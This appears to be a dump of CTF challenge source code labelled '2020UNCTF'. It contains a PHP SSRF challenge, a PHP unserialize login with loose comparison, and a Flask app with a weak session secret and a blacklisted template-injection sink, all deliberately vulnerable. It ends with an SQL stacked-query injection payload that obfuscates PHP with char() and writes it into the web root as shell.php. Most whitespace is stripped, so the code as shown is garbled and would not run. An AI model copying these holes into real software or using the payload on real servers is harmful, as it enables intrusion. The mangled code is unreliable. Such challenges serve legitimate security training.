<?phpecho'<center><strong>welc0me to 2020UNCTF!!</strong></center>';highlight_file(__FILE__);$url=$_GET['url'];if(preg_match('/unctf\.com/',$url)){if(!preg_match('/php|file|zip|bzip|zlib|base|data/i',$url)){$url=file_get_contents($url);echo($url);}else{echo('error!!');}}else{echo("error");}
<?phpshow_source(__FILE__);$username="admin";$password="password";include("flag.php");$data=isset($_POST['data'])?$_POST['data']:"";$data_unserialize=unserialize($data);if($data_unserialize['username']==$username&&$data_unserialize['password']==$password){echo$flag;}else{echo"username or password error!";}
fromflaskimport*importrandomasrdimportosapp=Flask(__name__)defranstr(num):H='abcdefghijklmnopqrstuvwxyz0123456789'salt=''foriinrange(num):salt+=rd.choice(H)returnsaltSECRET=ranstr(4)Flask.secret_key=SECRETBLACKLIST=['%','_','eval','open','flag','in','-','class','mro','[',']','\"','\'']user_dicts=dict()definit():user_dicts["admin"]=User('admin',ranstr(32))classUser:def__init__(self,username,password):self.username=usernameself.password=passworddefblack_list(string):foriinstring:ifiinBLACKLIST:returnTruereturnFalse@app.route('/',methods=['GET'])defindex():if'username'insession:ifsession['username']=='admin':returnrender_template_string("admin login success and check the secret route /secret_route_you_do_not_know")else:returnrender_template('hello.html',name=session['username'])else:returnrender_template_string("a easy flask problem,first login as the admin")@app.route('/login',methods=['GET','POST'])deflogin():ifrequest.method=='POST':username=request.form['username']if'username'inrequest.formelse""password=request.form['password']if'password'inrequest.formelse""ifusername==""orpassword=="":returnrender_template_string("pass the username or password use get method")ifusernameinuser_dictsanduser_dicts[username].password==password:session['username']=usernameifusername=='admin':returnrender_template_string("admin login success!")else:returnrender_template_string("login success!!")else:returnrender_template_string("login fail! check /register")else:returnrender_template('login.html')@app.route('/register',methods=['GET','POST'])defregister():ifrequest.method=='POST':username=request.form['username']if'username'inrequest.formelse""password=request.form['password']if'password'inrequest.formelse""ifusername==""orpassword=="":returnrender_template_string("pass the username or password use get method")ifusernamenotinuser_dicts:user_dicts[username]=User(username,password)returnrender_template_string("register success")else:returnrender_template_string("the user already exists")else:returnrender_template('register.html')@app.route('/secret_route_you_do_not_know',methods=['GET'])defsecret():guess=request.args['guess']if'guess'inrequest.argselse''secret_num=rd.randint(0,100000)ifguess=='':returnrender_template_string("you should 'guess' the secret number")try:guess_num=int(guess)ifguess_num==secret_num:returnrender_template_string('final step, check the source code')else:returnrender_template_string('you are wrong')exceptException:ifnotblack_list(guess):returnrender_template_string(guess+' error!!')else:returnrender_template_string('black list filter')if__name__=='__main__':init()app.run(host='0.0.0.0',port=80)
Payload:1';PREPARE wjh from concat(char(115,101,108,101,99,116,32),"'",char(60),char(63),char(112),char(104),char(112),char(32),char(112),char(104),char(112),char(105),char(110),char(102),char(111),char(40),char(41),char(59),char(63),char(62),"' into outfile '/var/www/html/shell", char(46) ,"php'");EXECUTE wjh;#